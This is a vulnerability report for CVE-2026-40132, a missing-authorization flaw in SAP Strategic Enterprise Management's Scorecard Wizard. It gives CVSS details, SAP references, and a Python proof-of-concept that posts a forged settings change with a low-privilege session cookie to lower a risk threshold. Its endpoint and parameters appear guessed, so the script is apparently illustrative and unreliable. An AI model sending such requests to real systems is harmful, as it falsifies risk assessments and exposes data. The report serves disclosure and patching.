Security Vulnerability Report
CVE-2026-40132 CVSS 5.4 MEDIUM

Published: 2026-05-12 03:16:12
Last Modified: 2026-05-12 03:16:12

Description

Due to a missing authorization check in SAP Strategic Enterprise Management (Scorecard Wizard in Business Server Pages), an authenticated attacker could access information that they are otherwise unauthorized to view. This vulnerability also enables the attacker to change the default settings and modify value fields, which will mislead risk evaluations and falsely lower assessed risk levels. This results in a low impact on the confidentiality and integrity of the data. There is no impact on the application's availability.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

No configuration data available.

SAP Strategic Enterprise Management (for version information, refer to SAP Security Patch Day 2026)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target configuration
# Replace with the actual vulnerable endpoint URL
target_url = "https://[target_host]/sap/bc/bsp/sap/scorecard_wizard/settings.do"

# Attacker's session cookie (obtained after low-privilege login)
session_cookie = {
    "MYSAPSSO2": "...valid_sso2_token...",
    "sap-usercontext": "sap-language=EN&sap-client=100"
}

# Payload to modify value fields and mislead risk evaluation
# This exploits the missing authorization check
exploit_payload = {
    "action": "update_settings",
    "risk_field_id": "critical_risk_threshold",
    "new_value": "0.01",  # Artificially lowering the risk level
    "default_view": "modified_view"
}

try:
    print("[*] Attempting to exploit CVE-2026-40132...")
    # Sending the request using the low-privilege session
    response = requests.post(target_url, data=exploit_payload,
                             cookies=session_cookie, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the default settings and risk values have been modified.")
        print("[+] Response body:")
        print(response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://me.sap.com/notes/3721959 (SAP Note 3721959)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)
